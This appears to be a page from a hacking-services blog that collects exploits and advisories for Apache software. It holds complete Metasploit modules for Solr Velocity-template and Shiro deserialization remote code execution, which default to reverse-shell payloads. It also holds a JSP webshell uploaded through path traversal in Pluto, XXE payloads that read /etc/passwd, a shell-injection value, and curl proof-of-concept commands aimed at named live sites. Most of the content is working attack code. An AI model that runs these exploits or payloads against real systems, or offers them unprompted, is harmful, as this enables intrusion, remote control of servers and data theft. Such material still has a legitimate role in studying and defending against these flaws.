##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Solr Remote Code Execution via Velocity Template',
'Description' => %q(
This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
Velocity template. Currently, this module only supports Solr basic authentication.
From the Tenable advisory:
An attacker could target a vulnerable Apache Solr instance by first identifying a list
of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
template parameter in a specially crafted Solr request, leading to RCE.
),
'License' => MSF_LICENSE,
'Author' =>
[
's00py', # Discovery and PoC
'jas502n', # exploit code on Github
'AleWong', # ExploitDB contribution, and exploit code on Github
'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
],
'References' =>
[
[ 'EDB', '47572' ],
[ 'CVE', '2019-17558' ],
[ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
[ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
[ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
[ 'URL', 'https://github.com/jas502n/solr_rce'],
[ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
],
'Platform' => ['linux', 'unix', 'win'],
'Targets' =>
[
[
'Unix (in-memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
[
'Linux (dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'CmdStagerFlavor' => %w[curl wget]
}
],
[
'x86/x64 Windows PowerShell',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_psh,
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
}
],
[
'x86/x64 Windows CmdStager',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_cmdstager,
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
'CmdStagerFlavor' => %w[vbs certutil]
}
],
[
'Windows Exec',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :windows_exec,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' }
}
],
],
'DisclosureDate' => "2019-10-29", # ISO-8601 formatted
'DefaultTarget' => 0,
'Privileged' => false
)
)
register_options(
[
Opt::RPORT(8983),
OptString.new('USERNAME', [false, 'Solr username', 'solr']),
OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']),
OptString.new('TARGETURI', [false, 'Path to Solr', '/solr/'])
]
)
end
# if we are going to exploit, we only need one core to be exploitable
@vuln_core = ""
# OS specific stuff
@target_platform = ""
# if authentication is used
@auth_string = ""
def check_auth
# see if authentication is required for the specified Solr instance
auth_check = solr_get('uri' => normalize_uri(target_uri.path))
# successfully connected?
unless auth_check
print_bad("Connection failed!")
return nil
end
# if response code is not 200, then the Solr instance definitely requires authentication
unless auth_check.code == 200
# if authentication is required and creds are not provided, we cannot reliably check exploitability
if datastore['USERNAME'] == "" && datastore['PASSWORD'] == ""
print_bad("Credentials not provided, skipping credentialed check...")
return nil
end
# otherwise, try the given creds
auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string)
# successfully connected?
unless attempt_auth
print_bad("Connection failed!")
return nil
end
# if the return code is not 200, then authentication definitely failed
unless attempt_auth.code == 200
print_bad("Invalid credentials!")
return nil
end
store_valid_credential(
user: datastore['USERNAME'],
private: datastore['PASSWORD'],
private_type: :password,
proof: attempt_auth.to_s
)
@auth_string = auth_string
end
# a placeholder return value. Not requiring auth should throw no errors
""
end
# check for vulnerability existence
def check
auth_res = check_auth
unless auth_res
return CheckCode::Unknown("Authentication failed!")
end
# send a GET request to get Solr and system details
ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string)
# can't connect? that's an automatic failure
unless ver
return CheckCode::Unknown("Connection failed!")
end
# convert to JSON
ver_json = ver.get_json_document
# get Solr version
solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
print_status("Found Apache Solr #{solr_version}")
# get OS version details
@target_platform = ver_json['system']['name']
target_arch = ver_json['system']['arch']
target_osver = ver_json['system']['version']
print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}")
# uname doesn't show up for Windows, so run a check for that
if ver_json['system']['uname']
# print uname only when verbose
vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'")
end
# the vulnerability is only present in Solr versions <= 8.3.0
unless solr_version <= Gem::Version.new('8.3.0')
return CheckCode::Safe("Running version of Solr is not vulnerable!")
end
# enumerate cores
cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string)
# can't connect? that's yet another automatic failure
unless cores
return CheckCode::Unknown("Could not enumerate cores!")
end
# convert to JSON yet again
cores_json = cores.get_json_document
# draw up an array of all the cores
cores_list = Array.new
# get the core names
cores_json['status'].keys.each do |core_name|
cores_list.push(core_name)
end
# no cores? that means nothing to exploit.
if cores_list.empty?
return CheckCode::Safe("No cores found, nothing to exploit!")
end
# got cores? tell the operator which cores were found
print_status("Found core(s): #{cores_list.join(', ')}")
possibly_vulnerable_cores = {}
cores_list.each do |core|
# for each core, attempt to get config
core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string)
# can't retrieve configuration for that core? go next
unless core_config
print_error("Could not retrieve configuration for core #{core}!")
next
end
# convert to JSON
core_config_json = core_config.get_json_document
# if the core configuration does not include the Velocity Response Writer, it isn't vulnerable
if core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
vprint_good("Found Velocity Response Writer in use by core #{core}")
if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.")
possibly_vulnerable_cores.store(core, true)
else
# if params.resource.loader.enabled is false, we need to set it to true before exploitation
print_warning("params.resource.loader.enabled for core #{core} is set to false.")
possibly_vulnerable_cores.store(core, false)
end
else
vprint_error("Velocity Response Writer not found in core #{core}")
next
end
end
# look at the array of possibly vulnerable cores
if possibly_vulnerable_cores.empty?
CheckCode::Safe("No cores are vulnerable!")
else
# if possible, pick a core that already has params.resource.loader.enabled set to true
possibly_vulnerable_cores.each do |core|
if core[1] == true
@vuln_core = core
break
end
end
# otherwise, just pick the first one
if @vuln_core.to_s == ""
@vuln_core = possibly_vulnerable_cores.first
end
CheckCode::Vulnerable
end
end
# the exploit method
def exploit
unless [CheckCode::Vulnerable].include? check
fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
end
print_status("Targeting core '#{@vuln_core[0]}'")
# if params.resource.loader.enabled for that core is false
if @vuln_core[1] != true
# the new config in JSON format
enable_params_resource_loader = {
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}.to_json
opts_post = {
'method' => 'POST',
'connection' => 'Keep-Alive',
'ctype' => 'application/json;charset=utf-8',
'encode_params' => false,
'uri' => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
'data' => enable_params_resource_loader
}
unless @auth_string == ""
opts_post.store('authorization', @auth_string)
end
print_status("params.resource.loader.enabled is false, setting it to true...")
update_config = send_request_cgi(opts_post)
unless update_config
fail_with Failure::Unreachable, "Connection failed!"
end
# if we got anything other than a 200 back, the configuration update failed and the exploit won't work
unless update_config.code == 200
fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
end
print_good("params.resource.loader.enabled is now set to true!")
end
# windows...
if @target_platform.include? "Windows"
# if target is wrong, warn and exit before doing anything
unless target.name.include? "Windows"
fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
end
case target['Type']
# PowerShell...
when :windows_psh
# need PowerShell for this
winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
unless winenv_path
fail_with Failure::Unreachable, "Connection failed!"
end
# did the command to check for PATH execute?
unless winenv_path.code == 200
fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
end
# is PowerShell in PATH?
if /powershell/i =~ winenv_path.body.to_s
# only interested in the contents of PATH. Everything before it is irrelevant
paths = winenv_path.body.split('=')[1]
# confirm that PowerShell exists in the PATH by checking each one
paths.split(';').each do |path_val|
# if PowerShell exists in PATH, then we are good to go
unless /powershell/i =~ path_val
next
end
print_good("Found Powershell at #{path_val}")
# generate PowerShell command, encode with base64, and remove comspec
psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
# specify full path to PowerShell
psh_cmd.insert(0, path_val)
# exploit the thing
execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
break
end
else
fail_with Failure::BadConfig, "PowerShell not found!"
end
# ... CmdStager ...
when :windows_cmdstager
print_status("Sending CmdStager payload...")
execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
# ... or plain old exec?
when :windows_exec
cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}"
execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
end
end
# ... or nix-based?
if @target_platform.include? "Linux"
# if target is wrong, warn and exit before doing anything
if target.name.include? "Windows"
fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!"
end
case target['Type']
when :linux_dropper
execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
when :unix_memory
cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
end
end
end
# some prep work has to be done to work around the limitations of Java's Runtime.exec()
def execute_cmdstager_begin(_opts)
if @target_platform.include? "Windows"
@cmd_list.each do |command|
command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
end
else
@cmd_list.each do |command|
command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
end
end
end
# sic 'em, bois!
def execute_command(cmd, opts = {})
# custom template which enables command execution
template = <<~VELOCITY
#set($x="")
#set($rt=$x.class.forName("java.lang.Runtime"))
#set($chr=$x.class.forName("java.lang.Character"))
#set($str=$x.class.forName("java.lang.String"))
VELOCITY
# attempts to solve the quoting problem, partially successful
if target.name.include?("Unix")
template += <<~VELOCITY
#set($ex=$rt.getRuntime().exec("#{cmd}"))
VELOCITY
else
template += <<~VELOCITY
#set($ex=$rt.getRuntime().exec('#{cmd}'))
VELOCITY
end
template += <<~VELOCITY
$ex.waitFor()
VELOCITY
# the next 2 lines cause problems with CmdStager, so it's only used when needed
# during the check for PowerShell existence, or by specific payloads
if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory
template += <<~VELOCITY
#set($out=$ex.getInputStream())
#if($out.available())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
#else
#end
VELOCITY
end
# execute the exploit...
raw_result = solr_get(
'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
'auth' => opts['auth_string'],
'vars_get' => {
'q' => '1',
'wt' => 'velocity',
'v.template' => 'custom',
'v.template.custom' => template
}
)
# Executing PATH always gives a result, so it can return safely
if opts['winenv_check']
return raw_result
end
# for printing command output
unless raw_result.nil?
unless raw_result.code == 200
fail_with Failure::PayloadFailed, "Payload failed to execute!"
end
# to get pretty output
result_inter = raw_result.body.to_s.sub("0\n", ":::").split(":::").last
unless result_inter.nil?
final_result = result_inter.split("\n").first.strip
print_good(final_result)
end
end
end
# make sending requests easier
def solr_get(opts = {})
send_request_cgi_opts = {
'method' => 'GET',
'connection' => 'Keep-Alive',
'uri' => opts['uri']
}
# @auth_string defaults to "" if no authentication is necessary
# otherwise, authentication is required
if opts['auth'] != ""
send_request_cgi_opts.store('authorization', opts['auth'])
end
# a bit unrefined, but should suffice in this case
if opts['vars_get']
send_request_cgi_opts.store('vars_get', opts['vars_get'])
end
send_request_cgi(send_request_cgi_opts)
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863590080
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Document Title:
===============
Apache Sling Framework v2.3.6 (Adobe AEM) [CVE-2016-0956] - Information Disclosure Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1536
Adobe Bulletin: https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0956
Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2016/02/10/apache-sling-fw-v236-remote-slingpostservlet-exception-vulnerability
CVE-ID:
=======
CVE-2016-0956
Release Date:
=============
2016-02-10
Vulnerability Laboratory ID (VL-ID):
====================================
1536
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Apache Sling is a web framework that uses a Java Content Repository, such as Apache Jackrabbit, to store and manage content. Sling applications use either scripts
or Java servlets, selected based on simple name conventions, to process HTTP requests in a RESTful way. The embedded Apache Felix OSGi framework and console provide
a dynamic runtime environment, where code and content bundles can be loaded, unloaded and reconfigured at runtime. As the first web framework dedicated to JSR-170
Java Content Repositories, Sling makes it very simple to implement simple applications, while providing an enterprise-level framework for more complex applications.
(Copy of the Vendor Homepage: http://sling.apache.org/)
Adobe Experience Manager (AEM) provides a complete suite of applications for the Web Experience Management (WEM) of organizations.
(Copy of the Vendor Homepage: https://docs.adobe.com/docs/en/aem/6-1.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a remote vulnerability in the official Apache Sling Framwork v2.3.6 software.
Vulnerability Disclosure Timeline:
==================================
2016-02-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apache Software Foundation
Product: Apache Sling - Framework (Adobe AEM) 2.3.6
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
It seems that on some instances of AEM, due to lack of proper security controls and or misconfiguration, it is possible for remote unauthenticated
users to enumerate local system files/folders that arent accessible publicly to unauthenticated users.
This can be achieved by sending a `delete` requests to the SlingPostServlet which in return, responds back with a 500 exception page and the
following exception message: (org.apache.sling.api.resource.PersistenceException - Unable to commit changes to session)
No actual files are deleted with this request however, the HTML response contains a `ChangeLog` field which is where all enumerated folder/file
names are displayed (if existing). For instance, following POC command can be used to reproduce the said behavior.
curl -F``:operation=delete`` -F``:applyTo=/foldername/*`` http://website.com/path/file.html
To reproduce this in real world, I found an adobe website which is currently affected with this behavior. You can use the following CURL command
to reproduce the POC:
curl -F``:operation=delete`` -F``:applyTo=/etc/*`` https://server/content/adobedemolab/welcome-page.html
Note: This curl command should enumerate all files/folders which currently exist in /etc folder
This vulnerability currently affects major websites i.e. almost every instance of Adobe AEM published on the internet. Some references are included below for reference.
Affected Framework(s):
Apache Sling
Affected Product(s)
Adobe AEM (All Versions)
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege system user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC:
1. curl -F":operation=delete" -F":applyTo=/foldername/*" http://website.com/path/file.html
2. curl -F":operation=delete" -F":applyTo=/etc/*" https://www.adobedemo.com/content/adobedemolab/welcome-page.html
Solution - Fix & Patch:
=======================
The vulnerability is fixed in version Servlets POST 2.3.8. Please update by by automatic request or implement the manual fix.
Adobe: Hot fix 6445 resolves an information disclosure vulnerability affecting Apache Sling Servlets Post 2.3.6 (CVE-2016-0956).
Security Risk:
==============
The security risk of the exception software vulnerability in the apache sling framework is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com] (https://twitter.com/cybercrimenews)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
source: https://www.securityfocus.com/bid/54341/info
Apache Sling is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to exhaust available memory, resulting in a denial-of-service condition.
Apache Sling 2.1.0 and prior are vulnerable.
curl -u admin:pwd -d "" "http://example.com/content/foo/?./%40CopyFrom=../"
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE',
'Description' => %q{
This vulnerability allows remote attackers to execute arbitrary code on vulnerable
installations of Apache Shiro v1.2.4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'L / l-codes[at]qq.com' # Metasploit module
],
'References' =>
[
['CVE', '2016-4437'],
['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1']
],
'Platform' => %w{ win unix },
'Arch' => [ ARCH_CMD ],
'Targets' =>
[
[
'Unix Command payload',
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
],
[
'Windows Command payload',
'Arch' => ARCH_CMD,
'Platform' => 'win'
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 7 2016',
'Privileged' => false,
'DefaultOptions' =>
{
'WfsDelay' => 5
}
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
])
end
def aes_encrypt(payload)
aes = OpenSSL::Cipher.new('aes-128-cbc')
aes.encrypt
aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==')
aes.random_iv + aes.update(payload) + aes.final
end
def exploit
cmd = payload.encoded
vprint_status("Execute CMD: #{cmd}")
type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' )
java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type)
ciphertext = aes_encrypt(java_payload)
base64_ciphertext = Rex::Text.encode_base64(ciphertext)
send_request_cgi({
'uri' => target_uri.path,
'method' => 'GET',
'cookie' => "rememberMe=#{base64_ciphertext}"
})
end
end
source: https://www.securityfocus.com/bid/63260/info
Apache Shindig is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Apache Shindig 2.5.0 is vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module>
<ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" />
</ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module>
# Exploit Title: Apache Portals Pluto 3.0.0 - Remote Code Execution
# Date: 2018-09-12
# Exploit Author: Che-Chun Kuo
# Vendor Homepage: https://portals.apache.org/pluto/
# Software Link: http://archive.apache.org/dist/portals/pluto/
# Version: 3.0.0
# Tested on: Windows
# Advisory: https://portals.apache.org/pluto/security.html
# Other Vulnerability Types: Authentication bypass, directory traversal, arbitrary file upload
# CVE: CVE-2018-1306
# Vulnerability 1: Authentication bypass via HTTP verb tampering
# Description: Apache Pluto uses web.xml security constraints to control access to resources.
# These security constraints have been insecurely defined allowing authentication to be bypassed.
# When specific http methods are listed within a security constraint, then only those
# methods are protected. Pluto defines the following http methods: GET, POST, and PUT.
# Since the HEAD method is not listed, a request with a HTTP HEAD method effectively
# circumvents the security policy.
# Vulnerability 2: Remote code execution via arbitrary file upload
# Description: An attacker can call the PortletV3AnnotatedDemo Multipart Portlet and upload
# an arbitrary file. The uploaded file is directly accessible within
# the /PortletV3AnnotatedDemo/temp/ directory. This technique allows an unauthenticated
# attacker to install a malicious JSP file and remotely execute code on a server running Apache Pluto.
# Insecure Remediation: This vulnerability was mitigated by moving the /temp directory
# outside the /webapps directory and under the Tomcat directory.
# Vulnerability 3: Directory traversal in multipart file upload
# Description: Apache Pluto's multipart file uploader is vulnerable to directory traversal.
# An attacker is able to upload a file outside the default /temp directory to an arbitrary location
# on the filesystem. The following filename will drop a JSP webshell
# into the /webapps/pluto public directory: filename="../../../webapps/pluto/jspshell.jsp".
# Leveraging this technique, remote code execution via webshell is still possible despite
# remediation in Vulnerability 2.
# PROOF OF CONCEPT
# UPLOAD REQUEST 1 - TEMP DIR INSIDE WEBROOT
HEAD /pluto/portal/File%20Upload/__pdPortletV3AnnotatedDemo.MultipartPortlet%21-1517407963%7C0;0/__ac0 HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=XX
Content-Length: 727
--XX
Content-Disposition: form-data; name="file"; filename="jspshell.jsp"
Content-Type: application/octet-stream
<FORM METHOD=GET ACTION='jspshell.jsp'>
CMD: <INPUT name='cmd' type=text value="cmd /c dir">
<INPUT type=submit value='Run'></FORM>
<%@ page import="java.io.*" %>
<%
String cmd = "whoami";
String param = request.getParameter("cmd");
if (param != null){ cmd = param; }
String s = null;
String output = "";
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\r\n"; }
} catch(IOException e) { e.printStackTrace(); }
%>
<pre><%=output %></pre>
--XX--
# UPLOAD REQUEST 2 - TEMP DIR OUTSIDE WEBROOT
HEAD /pluto/portal/File%20Upload/__pdPortletV3AnnotatedDemo.MultipartPortlet%21-1517407963%7C0;0/__ac0 HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=XX
Content-Length: 748
--XX
Content-Disposition: form-data; name="file"; filename="../../../webapps/pluto/jspshell.jsp"
Content-Type: application/octet-stream
<FORM METHOD=GET ACTION='jspshell.jsp'>
CMD: <INPUT name='cmd' type=text value="cmd /c dir">
<INPUT type=submit value='Run'></FORM>
<%@ page import="java.io.*" %>
<%
String cmd = "whoami";
String param = request.getParameter("cmd");
if (param != null){ cmd = param; }
String s = null;
String output = "";
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\r\n"; }
} catch(IOException e) { e.printStackTrace(); }
%>
<pre><%=output %></pre>
--XX--
# EXECUTE CMD
----------------------------------------
http://localhost:8080/pluto/jspshell.jsp?cmd=hostname
Exploit Title: Stored XSS
# Date: 25-04-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://portals.apache.org/pluto
# Software Link: https://portals.apache.org/pluto/download.html
# Version: 3.0.0, 3.0.1
# Tested on: Ubuntu 16.04 LTS
# CVE: CVE-2019-0186
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-0186
# https://portals.apache.org/pluto/security.html
# https://www.inputzero.io/2019/04/apache-pluto-xss.html
Summary:
The "Chat Room" portlet demo that ships with the Apache Pluto Tomcat bundle
contains a Cross-Site Scripting (XSS) vulnerability. Specifically, if an
attacker can input raw HTML markup into the "Name" or "Message" input
fields and submits the form, then the inputted HTML markup will be embedded
in the subsequent web page.
Technical observation:
- Start the Apache Pluto Tomcat bundle
- Visit http://localhost:8080/pluto/portal/Chat%20Room%20Demo
- In the name field, enter:
<input type="text" value="Name field XSS></input>
- Click Submit
- In the message field, enter:
<input type="text" value="Message field XSS></input>
Patch:
3.0.x users should upgrade to 3.1.0
# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
# Google Dork: "Apache OpenMeetings DOS"
# Date: 2020-08-28
# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
# Vendor Homepage: https://openmeetings.apache.org/
# Software Link: https://openmeetings.apache.org/
# Version: 4.0.0 - 5.0.0
# Tested on: Windows
# CVE: CVE-2020-13951
- POC:
# Vulnerability variable: hostname
# Payload: x.x.x.x;ls
# Request exploit:
GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026
- Reference:
https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
https://nvd.nist.gov/vuln/detail/CVE-2020-13951
Severity: Moderate
Vendor: The Apache Software Foundation
Versions Affected: Apache OpenMeetings 1.9.x - 3.1.0
Description:
The Import/Export System Backups functionality in the OpenMeetings
Administration menu (http://domain:5080/openmeetings/#admin/backup) is vulnerable to path
traversal via specially crafted file names within ZIP archives.
By uploading an archive containing a file named ../../../public/hello.txt will write
the file "hello.txt" to the http://domain:5080/openmeetings/public/ directory. This could
be used to, for example, overwrite the /usr/bin/convert file (or any other 3 rd party
integrated executable) with a shell script, which would be executed the next time an image
file is uploaded and imagemagick is invoked.
All users are recommended to upgrade to Apache OpenMeetings 3.1.1
Credit: This issue was identified by Andreas Lindh
Apache OpenMeetings Team
--
WBR
Maxim aka solomax
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Apache Olingo OData 4.0
# Vendor: Apache Foundation
# CSNC ID: CSNC-2009-025
# CVE ID: CVE-2019-17554
# Subject: XML External Entity Resolution (XXE)
# Risk: High
# Effect: Remotely exploitable
# Author: Archibald Haddock (advisories@compass-security.com)
# Date: 08.11.2019
#
#############################################################
Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].
Affected:
---------
Vulnerable:
* Olingo OData 4.x.x to 4.6.x
Not vulnerable:
* Olingo OData 4.7.0
* The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01
Technical Description
---------------------
The XML content type entity deserializer is not configured to deny the resolution of external entities.
Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.
Request
======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
